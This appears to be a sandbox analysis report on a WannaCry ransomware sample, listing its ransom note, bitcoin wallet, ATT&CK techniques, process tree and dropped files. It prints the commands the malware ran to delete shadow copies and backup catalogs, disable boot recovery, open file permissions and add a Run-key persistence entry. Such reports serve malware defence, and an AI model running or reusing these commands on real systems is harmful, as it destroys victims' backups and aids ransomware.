wannacry | ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

Target

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Sample

200109-ta3m1dkh6n
SHA256

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

Score

10^/10

ransomware persistence worm wannacry

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\@[email protected]

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw

Signatures

Deletes shadow copies 2 TTPs 2 IoCs
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exeWMIC.exe

pid process

1368 vssadmin.exe
1180 WMIC.exe
Modifies file permissions 1 TTPs 1 IoCs

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

1108 icacls.exe

pid	process
1368	vssadmin.exe
1180	WMIC.exe

pid	process
1108	icacls.exe

Executes dropped EXE 16 IoCs

Processes:

taskdl.exe@[email protected]@[email protected]taskhsvc.exetaskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]

pid	process
1972	taskdl.exe
1924	@[email protected]
240	@[email protected]
2020	taskhsvc.exe
1116	taskdl.exe
1912	taskse.exe
1108	@[email protected]
1340	taskdl.exe
1252	taskse.exe
1112	@[email protected]
1608	taskdl.exe
1616	taskse.exe
1524	@[email protected]
2012	taskdl.exe
1840	taskse.exe
1956	@[email protected]

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

taskhsvc.exe

pid process

2020 taskhsvc.exe

pid	process
2020	taskhsvc.exe

Suspicious use of AdjustPrivilegeToken 27 IoCs

Processes:

vssvc.exetaskse.exeWMIC.exetaskse.exetaskse.exetaskse.exe

description	pid	process
Token: SeBackupPrivilege	1996	vssvc.exe
Token: SeRestorePrivilege	1996	vssvc.exe
Token: SeAuditPrivilege	1996	vssvc.exe
Token: SeTcbPrivilege	1912	taskse.exe
Token: SeIncreaseQuotaPrivilege	1180	WMIC.exe
Token: SeSecurityPrivilege	1180	WMIC.exe
Token: SeTakeOwnershipPrivilege	1180	WMIC.exe
Token: SeLoadDriverPrivilege	1180	WMIC.exe
Token: SeSystemProfilePrivilege	1180	WMIC.exe
Token: SeSystemtimePrivilege	1180	WMIC.exe
Token: SeProfSingleProcessPrivilege	1180	WMIC.exe
Token: SeIncBasePriorityPrivilege	1180	WMIC.exe
Token: SeCreatePagefilePrivilege	1180	WMIC.exe
Token: SeBackupPrivilege	1180	WMIC.exe
Token: SeRestorePrivilege	1180	WMIC.exe
Token: SeShutdownPrivilege	1180	WMIC.exe
Token: SeDebugPrivilege	1180	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1180	WMIC.exe
Token: SeRemoteShutdownPrivilege	1180	WMIC.exe
Token: SeUndockPrivilege	1180	WMIC.exe
Token: SeManageVolumePrivilege	1180	WMIC.exe
Token: 33	1180	WMIC.exe
Token: 34	1180	WMIC.exe
Token: 35	1180	WMIC.exe
Token: SeTcbPrivilege	1252	taskse.exe
Token: SeTcbPrivilege	1616	taskse.exe
Token: SeTcbPrivilege	1840	taskse.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

@[email protected]

pid process

1108 @[email protected]
Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry

pid	process
1108	@[email protected]

Suspicious use of WriteProcessMemory 26 IoCs

Processes:

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.execmd.execmd.exe@[email protected]@[email protected]cmd.execmd.exe

description	pid	process	target process
PID 1412 wrote to memory of 1124	1412	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	attrib.exe
PID 1412 wrote to memory of 1108	1412	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	icacls.exe
PID 1412 wrote to memory of 1972	1412	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskdl.exe
PID 1412 wrote to memory of 1180	1412	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	cmd.exe
PID 1180 wrote to memory of 1124	1180	cmd.exe	cscript.exe
PID 1412 wrote to memory of 1924	1412	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	@[email protected]
PID 1412 wrote to memory of 2024	1412	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	cmd.exe
PID 2024 wrote to memory of 240	2024	cmd.exe	@[email protected]
PID 1924 wrote to memory of 2020	1924	@[email protected]	taskhsvc.exe
PID 240 wrote to memory of 884	240	@[email protected]	cmd.exe
PID 884 wrote to memory of 1368	884	cmd.exe	vssadmin.exe
PID 1412 wrote to memory of 1116	1412	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskdl.exe
PID 884 wrote to memory of 1180	884	cmd.exe	WMIC.exe
PID 1412 wrote to memory of 1912	1412	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskse.exe
PID 1412 wrote to memory of 1108	1412	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	@[email protected]
PID 1412 wrote to memory of 1208	1412	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	cmd.exe
PID 1208 wrote to memory of 1536	1208	cmd.exe	reg.exe
PID 1412 wrote to memory of 1340	1412	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskdl.exe
PID 1412 wrote to memory of 1252	1412	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskse.exe
PID 1412 wrote to memory of 1112	1412	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	@[email protected]
PID 1412 wrote to memory of 1608	1412	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskdl.exe
PID 1412 wrote to memory of 1616	1412	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskse.exe
PID 1412 wrote to memory of 1524	1412	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	@[email protected]
PID 1412 wrote to memory of 2012	1412	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskdl.exe
PID 1412 wrote to memory of 1840	1412	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskse.exe
PID 1412 wrote to memory of 1956	1412	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	@[email protected]

Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]

pid process

240 @[email protected]
1924 @[email protected]
1108 @[email protected]
1112 @[email protected]
1524 @[email protected]
1956 @[email protected]

pid	process
240	@[email protected]
1924	@[email protected]
1108	@[email protected]
1112	@[email protected]
1524	@[email protected]
1956	@[email protected]

Drops startup file 6 IoCs

Processes:

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

description	ioc	process
File created (read-only)	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD7461.tmp	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD7461.tmp	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File deleted	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD7461.tmp	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File created (read-only)	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD7494.tmp	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD7494.tmp	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File deleted	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD7494.tmp	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Adds Run entry to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ftqqepmlkbmm513 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\tasksche.exe\""	reg.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

1124 attrib.exe
Loads dropped DLL 5 IoCs

Processes:

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.execscript.execmd.exe@[email protected]taskhsvc.exe

pid process

1412 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
1124 cscript.exe
2024 cmd.exe
1924 @[email protected]
2020 taskhsvc.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1536 reg.exe

pid	process
1124	attrib.exe

pid	process
1412	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
1124	cscript.exe
2024	cmd.exe
1924	@[email protected]
2020	taskhsvc.exe

pid	process
1536	reg.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

@[email protected]ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	@[email protected]
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
"C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"
1⤵
- Suspicious use of WriteProcessMemory
- Drops startup file
- Loads dropped DLL
- Sets desktop wallpaper using registry
PID:1412

C:\Windows\SysWOW64\attrib.exe
attrib +h .
2⤵
- Views/modifies file attributes
PID:1124

C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:1108

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:1972

C:\Windows\SysWOW64\cmd.exe
cmd /c 185061578576852.bat
2⤵
- Suspicious use of WriteProcessMemory
PID:1180

C:\Windows\SysWOW64\cscript.exe
cscript.exe //nologo m.vbs
3⤵
- Loads dropped DLL
PID:1124

C:\Users\Admin\AppData\Local\Temp\@[email protected]
@[email protected] co
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
- Loads dropped DLL
PID:1924

C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exe
TaskData\Tor\taskhsvc.exe
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Loads dropped DLL
PID:2020

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /b @[email protected] vs
2⤵
- Suspicious use of WriteProcessMemory
- Loads dropped DLL
PID:2024

C:\Users\Admin\AppData\Local\Temp\@[email protected]
@[email protected] vs
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
PID:240

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
4⤵
- Suspicious use of WriteProcessMemory
PID:884

C:\Windows\SysWOW64\vssadmin.exe
vssadmin delete shadows /all /quiet
5⤵
- Deletes shadow copies
PID:1368

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
5⤵
- Deletes shadow copies
- Suspicious use of AdjustPrivilegeToken
PID:1180

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:1116

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1912

C:\Users\Admin\AppData\Local\Temp\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Sets desktop wallpaper using registry
PID:1108

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "ftqqepmlkbmm513" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1208

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "ftqqepmlkbmm513" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f
3⤵
- Adds Run entry to start application
- Modifies registry key
PID:1536

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:1340

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1252

C:\Users\Admin\AppData\Local\Temp\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1112

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:1608

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1616

C:\Users\Admin\AppData\Local\Temp\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1524

C:\Users\Admin\AppData\Local\Temp\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
PID:2012

C:\Users\Admin\AppData\Local\Temp\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1840

C:\Users\Admin\AppData\Local\Temp\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1956

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1996

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File Deletion

T1107

File and Directory Permissions Modification

T1222

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\0.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\00000000.res

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\10.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\11.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\12.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\13.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\14.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\15.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\16.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\17.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\18.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\185061578576852.bat

Download Submit
C:\Users\Admin\AppData\Local\Temp\19.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\2.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\20.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\21.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\22.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\23.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\24.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\25.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\26.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\27.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\28.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\3.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\4.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\5.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\6.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\7.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\8.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\9.WNCRYT

Download Submit
C:\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
C:\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
C:\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
C:\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
C:\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
C:\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
C:\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
C:\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\LIBEAY32.dll

Download Submit
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\SSLEAY32.dll

Download Submit
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\libevent-2-0-5.dll

Download Submit
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\libgcc_s_sjlj-1.dll

Download Submit
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\libssp-0.dll

Download Submit
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\zlib1.dll

Download Submit
C:\Users\Admin\AppData\Local\Temp\b.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\c.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\c.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\m.vbs

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_bulgarian.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_chinese (simplified).wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_chinese (traditional).wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_croatian.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_czech.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_danish.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_dutch.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_english.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_filipino.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_finnish.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_french.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_german.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_greek.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_indonesian.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_italian.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_japanese.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_korean.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_latvian.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_norwegian.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_polish.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_portuguese.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_romanian.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_russian.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_slovak.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_spanish.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_swedish.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_turkish.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_vietnamese.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\r.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\s.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\t.wnry

Download Submit
C:\Users\Admin\AppData\Local\Temp\taskdl.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\taskdl.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\taskdl.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\taskdl.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\taskdl.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\taskdl.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\taskse.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\taskse.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\taskse.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\taskse.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\taskse.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\u.wnry

Download Submit
C:\Users\Admin\Desktop\@[email protected]

Download Submit
\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
\Users\Admin\AppData\Local\Temp\@[email protected]

Download Submit
\Users\Admin\AppData\Local\Temp\TaskData\Tor\libeay32.dll

Download Submit
\Users\Admin\AppData\Local\Temp\TaskData\Tor\libevent-2-0-5.dll

Download Submit
\Users\Admin\AppData\Local\Temp\TaskData\Tor\libgcc_s_sjlj-1.dll

Download Submit
\Users\Admin\AppData\Local\Temp\TaskData\Tor\libssp-0.dll

Download Submit
\Users\Admin\AppData\Local\Temp\TaskData\Tor\ssleay32.dll

Download Submit
\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exe

Download Submit
\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exe

Download Submit
\Users\Admin\AppData\Local\Temp\TaskData\Tor\zlib1.dll

Download Submit
\Users\Admin\AppData\Local\Temp\taskdl.exe

Download Submit
\Users\Admin\AppData\Local\Temp\taskdl.exe

Download Submit
\Users\Admin\AppData\Local\Temp\taskdl.exe

Download Submit
\Users\Admin\AppData\Local\Temp\taskdl.exe

Download Submit
\Users\Admin\AppData\Local\Temp\taskdl.exe

Download Submit
\Users\Admin\AppData\Local\Temp\taskdl.exe

Download Submit
\Users\Admin\AppData\Local\Temp\taskdl.exe

Download Submit
\Users\Admin\AppData\Local\Temp\taskdl.exe

Download Submit
\Users\Admin\AppData\Local\Temp\taskdl.exe

Download Submit
\Users\Admin\AppData\Local\Temp\taskdl.exe

Download Submit
\Users\Admin\AppData\Local\Temp\taskse.exe

Download Submit
\Users\Admin\AppData\Local\Temp\taskse.exe

Download Submit
\Users\Admin\AppData\Local\Temp\taskse.exe

Download Submit
\Users\Admin\AppData\Local\Temp\taskse.exe

Download Submit
\Users\Admin\AppData\Local\Temp\taskse.exe

Download Submit
\Users\Admin\AppData\Local\Temp\taskse.exe

Download Submit
\Users\Admin\AppData\Local\Temp\taskse.exe

Download Submit
\Users\Admin\AppData\Local\Temp\taskse.exe

Download Submit
memory/1108-707-0x00000000023A0000-0x00000000023A1000-memory.dmp

Filesize
4KB

Download
memory/1124-44-0x00000000026B0000-0x00000000026B4000-memory.dmp

Filesize
16KB

Download
memory/1412-2-0x0000000010000000-0x0000000010010000-memory.dmp

Filesize
64KB

Download
memory/2020-402-0x0000000003420000-0x0000000003431000-memory.dmp

Filesize
68KB

Download
memory/2020-403-0x0000000003830000-0x0000000003841000-memory.dmp

Filesize
68KB

Download
memory/2020-404-0x0000000003420000-0x0000000003431000-memory.dmp

Filesize
68KB

Download
memory/2020-235-0x0000000002CC0000-0x0000000002CD1000-memory.dmp

Filesize
68KB

Download
memory/2020-237-0x0000000002CC0000-0x0000000002CD1000-memory.dmp

Filesize
68KB

Download
memory/2020-68-0x0000000002CC0000-0x0000000002CD1000-memory.dmp

Filesize
68KB

Download
memory/2020-70-0x0000000002CC0000-0x0000000002CD1000-memory.dmp

Filesize
68KB

Download
memory/2020-236-0x00000000030D0000-0x00000000030E1000-memory.dmp

Filesize
68KB

Download
memory/2020-69-0x00000000030D0000-0x00000000030E1000-memory.dmp

Filesize
68KB

Download